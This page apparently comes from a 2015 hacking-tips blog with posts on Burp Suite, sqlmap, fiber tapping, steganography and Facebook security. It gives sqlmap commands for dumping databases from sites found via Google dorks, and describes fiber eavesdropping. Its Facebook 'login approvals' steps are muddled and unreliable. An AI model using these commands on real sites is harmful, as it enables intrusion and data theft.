Pro Hack Tricks: 2015

Thursday, December 10, 2015

BURP SUITE BASICS

WHAT IS BURP SUITE??????

Burp suite is a popular platform in the field of web application penetration testing .It gives you various options in order to explore the basic fundamental process that goes on when a web application is in use.

In this blog I will show how to set-up burp suite and I will also be doing a simple authentication bypass in order to show you clearly how does this platform works.

HOW TO SET-UP BURP SUITE:

1)Download burp suite from https://portswigger.net/burp/ its free

2)Open burp suite.

3)Go to proxy---->options

3)Then feed the IP and port .By default the IP will be 127.0.0.1 & port will be 8080.

4)Open your browser. Go to network options.

5)Change the configuration from NO PROXY to MANUAL PROXY and feed the same IP that you feeded in the burp suite proxy option.

6)Now your Burp suite is set-up.

Ok now that the burp suite is setup .Let me show you a simple authentication bypass using burp suite. For this I will take the help of mutillidae.

-->I opened a simple login page in mutillidae.

-->Filled in random username and password.Go to intercept option in burpsuite and turn the intercept ON.

-->Now click on LOGIN.

-->Now check the burp suite and you will find intercept data as shown below.

-->Change the username and password with sql payload.

-->Click on forward.

-->And WWWOOOLLLAAA!!!! Its done. Successfully done an authentication bypass

Hope you got a basic knowledge about this platform and what it is capable of .

TILL THE NEXT BLOG SA-YO-NARA!!!!
And don't forget to COMMENT down your suggestions.

Terms & Warning:

Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.

Monday, October 5, 2015

SQL INJECTION USING SQLMAP

This post is about using tool for Penetration Testing that is SQL MAP. Once we get some error on website regarding sql then we can exploit that vulnerability using sql map. But first we need to find some vulnerable links of a targeted websites.

HOW TO FIND SQL ERROR IN A TARGETED WEBSITE??

So For getting targeted links of a website you need to use google dorks for Example- site: "Targeted website" inurl:.php?id= (Without double quotes). As you will get links related to this then you can open the links and put single quote( ' ) after the link and check vulnerability. If the links the is vulnerable then sql error will pop up like this (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1) this is just an example. The error for sql includes SQL in it so you only have to check if sql is listed in it and might also be the mysql error it is also the part of SQL. Some where it should be SQL then it is vulnerable.

Now the real game starts for exploiting that vulnerable link.

So now you need SQL MAP and i will use in KALI LINUX (This OS is used by HACKERS). You can use in WINDOWS, MAC, UBUNTU in all the OS steps are same.

Step 01 :- sqlmap -u "Vulnerable URL" and press enter

Step 02 :- Check whether the Vulnerable URL is injectable or not.

Here url is Vulnerable so i will get injection point.

Step 03 :- If you get any injection point, then choose the injection point that you want to apply.

Step 04 :- These injection points found by SQLMap are also saved in sqlmap specified address.

You can directly copy PAYLOAD from SQLMAP also here i will directly copy from SQLMAP

Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter

Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)

Step 07 :- Choose the database and fetch the tables.

Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database

Step 09 :- Fetch the columns now of chosen tables.

Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table

You can fetch multiple columns by adding (,) to the column name.

Step 11 :- Get the data of all columns of chosen_table by dumping it.

Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table

You have now dump of the following data base.

Here is video for this topic

NOTE:

With out prior permition of Developer or Admin of the Website or Webaplication it is illegal to test it for any Vulnerability assessment.

Friday, October 2, 2015

DATA BREACH IN OPTICAL FIBER NETWORKS

This post is going to break some of the most famous myths about optical fiber networks. Recently copper cables are replaced by fiber optics for the fact that fiber optic cables are far more efficient than the copper cables. Data flowing through the copper cables were easily tapped using magnetic induction techniques. Fiber optics overcame this problem as the data inside is in the form of light and it doesn't produce any magnetic field around the surface of the wire.

First of all lets look into the construction of the optic fiber cable.
Optical fiber include the following:-

1)Core - Center most part (glass).

2)Cladding - The second layer of glass above the core.

3)Buffer jacket - It provides protection to the fiber from external mechanical
influences.

4)Kevlar- After buffer jacket comes a layer of kevlar which increases the tensile
strength of the cable.

5)Black polyurethane jacket - It is the outer-most layer of the fiber optic cable

There are certain myths surrounding fiber optic networks. They are as follows:-

-->Fiber optic is completely secure.

-->Dark fibers provided by the carriers are secure.

-->Data is protected by volume.

-->Width Data Modulation networks cannot be tapped.

Now I am going to introduce you to some of the tapping techniques that can be used to breach data from a optic fiber network and which is going to break all the myths mentioned above.

Tapping techniques of fiber optic cable are usually passive, safe & cheap

-->PASSIVE - it doesn't rise suspicion to end users.

-->SAFE - they doesn't leave trace of attacker.

-->CHEAP - tools that can be used to tap are very much cheap.

Given below are the tapping techniques of fiber optics cable :-

A) COUPLER SPLICE-IN :-

In this technique a fiber coupler is used that has 1 input and 2 outputs. Below a splice-in coupler is shown .

This is the simplest and most primitive method of tapping into a fiber optic cable. Here, the fiber optic cable is cut and a coupler is spliced in such a way that

the signal continues to the intended party whilst being eavesdropped by the attacker.

B) FIBER BENDING COUPLING :-

In this technique clip-on coupler is used to tap the data.

Below a clip-on coupler is shown.

Data in the form of light inside the optical fiber has to compulsorily follow the principle of total internal reflection. But when optic fiber cable is bend over a certain angle then it start defying the principle of total internal reflection and some amount of light start to seep through the surface of the cable at the point of bending which invisible for naked eyes . The bending coupler captures
this light and the astonishing fact is that full amount of data can be obtained by the attacker even capturing small amount of light from the optic cable.

C) EVANESCENT COUPLING :-

Although most of the signal lies in the core of the fiber, a fraction of the light is also extended into the cladding. This fraction of light is called the evanescent field. Removing the fiber coating and a part of the cladding without touching the core would enable an attacker to access the evanescent field and eavesdrop on the line. For a skilled technician, the whole process would take approximately one hour to complete.

Through capturing only a small percentage of the light, a hacker can obtain 100% of the information.

Now that we have seen all the tapping techniques lets discuss about some security solutions.

SOLUTIONS FROM SECURITY POINT OF VIEW:-

1) Attenuation monitoring:-

Optical signals suffer from minor degradations as they travel through the fiber. This is usually caused by scattering and absorption of light across the length of
the fiber and is known as attenuation. Devices to check the attenuation of signal in an optical fiber are available and can be used to check if there are alterations in the predetermined intensity of the signal. Any alteration in the attenuation could then be detected.

The limitations possessed by this method is that it will be unable to detect evanescent coupling tap and detect a coupler that is already placed in the fiber.

2) Providing encryption:-

We can provide encryption for the data that is being transferred through the optic cable. Employing the right encryption technology will help corporations ensure that performance is not sacrificed for security. Encrypting data at layer 2 (data link layer) can ensure high throughput and low latency (less than 10 microseconds. In contrast to layer 3 encryption (eg. IPSec), there is no encryption tax at layer 2 on the size of the data packets. Encryption can therefore be performed at wire speed (maximum data transmission rate) for even the most demanding 10Gbps links.

CONCLUSION :-

Organizations spends lots of money in setting up various technologies such as firewalls, IDS, IPS which is a good practice but, the fail to maintain the integrity of the information once it goes out of the organization. As malicious and criminal attacks spread, companies need to exercise due caution to protect their data.
Encryption is the only method to ensure real data security. This should be implemented as part of a coherent risk management and data protection
strategy. Whether companies plan to connect data centers, campus networks or foreign branches they need encryption – without encryption there is no
compliance, no confidentiality and ultimately no security.

But remember encryption is also not a ultimate solution but we can control the data breach to a great extend.
.

Friday, March 6, 2015

Steganography

Definition:- Steganography (STEHG-uh-NAH-gruhf-ee, from Greek steganos, means "covered," and graphie, means "writing") is the hiding of a secret message within an ordinary message and the extraction of it at its destination.

Stegnography is the art or practice of concealing a file, message, image, or video within another file, message, image, or video. The advantage of steganography over cryptography alone is that the intended secret message does not attract attention to itself as an object of scrutiny. Plainly visible encrypted messages no matter how unbreakable will arouse interest, and may in themselves be incriminating in countries where encryption is illegal.

The first recorded uses of steganography can be traced back to 440 BC when Herodotus mentions two examples in his Histories.Demaratus sent a warning about a forthcoming attack to Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface. Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand.

Modern steganography entered the world in 1985 with the advent of personal computers being applied to classical steganography problems. Development following that was very slow, but has since taken off, going by the large number of steganography software available

Making of Stegnography by CMD

Requirements

Pic
secret message that can be embbed in to it
CMD

Select any one pic from your system.
Write any secret message in notepad or word.(save both files in "d:" )
Open cmd

Commands

copy pic.jpg+secret.txt new pic.jpg

Here you can see the pic and text is combined.

How to see the messege written behing the pic.

.Open the pic (here it is "new pic") so i opened it. Now you will see the actual pic now "right click" and open with "Notepad". See the Message which you have written is in the end. So enter "end" from your keyboard and you will see the message which you have written is their

This was the trick of creating Steganography. Be safe and send encrypted message.

Reference:- http://en.wikipedia.org/wiki/Steganography

Monday, March 2, 2015

Facebook hacking and Security Tips(LOGIN APPROVALS)

Facebook Hacking

Now a days facebook is the key for making new friends, Chatting, Posting your picture sharing your private life to the internet. We are exited to know what our friends, family members, Gf/Bf with whom they are chatting, posting pics etc. So for getting someones information on facebook we are hacking into their accounts and getting their information.. There are many ways to crack someone facebook account. The hackers can only hack your account with your help with out your help nothing is possible.

WAYS OF HACKING FACEBOOK

Phishing
Keylogging
Social Engineering
Sniffing
Brutforce attack

This are the 5 ways by which your account can be hacked. So i want to tell you that without your help no one can crack your facebook account. Facebook doesent have any loopholes so that hacker can not enter into its server and get your id password. To secure your self is yourself is your responsibility. Facebook will provide you the security but its upto you to activate that or not.

Facebook Security

Today i will show you security called LOGIN APPROVALS. This is the security made by facebook like 2step verification. This security basically means when you enter the Id and password while the time of login this is not sufficient you will get OTP(One Time Password). when server will validate the same OTP then it will allow to access to your account. Same thing is their in many Emails,Net banking etc.

In ASIAN Countries this security is not available. But if you are living apart from Asian countries this feature is available. I am curently living in INDIA so this feature is not available. And the good thing is i have LOGIN APROVALS form more than last 6 months.

How to get LOGGIN APROVALS in Asian Countries. Here is the simple way to get LOGIN APROVALS activated in your account(2 step verification).

Download TOR Browser clisk on this link TOR Browser

Install it. After installing click on exe file

Now click on "Start Tor Browser".

The screen will apear like this after starting.

Now type url facebook.com

Enter Login id and Password
Then go to "Option" it is in top right side and select "Settings" as shown in image.

Once you entered in then click on "security" 2nd option on from top left side.

Now click on "App password" and select edit then "Generate app passwords" and follow steps.

You have done with LOGIN APPROVALS now you will get OTP to enter into your facebook id.

NOTE:- This is illegal process of getting LOGIN APPROVALS. IN Asian Countries this feature has not came into play. So keep this for educational purpose only. Do'nt try this.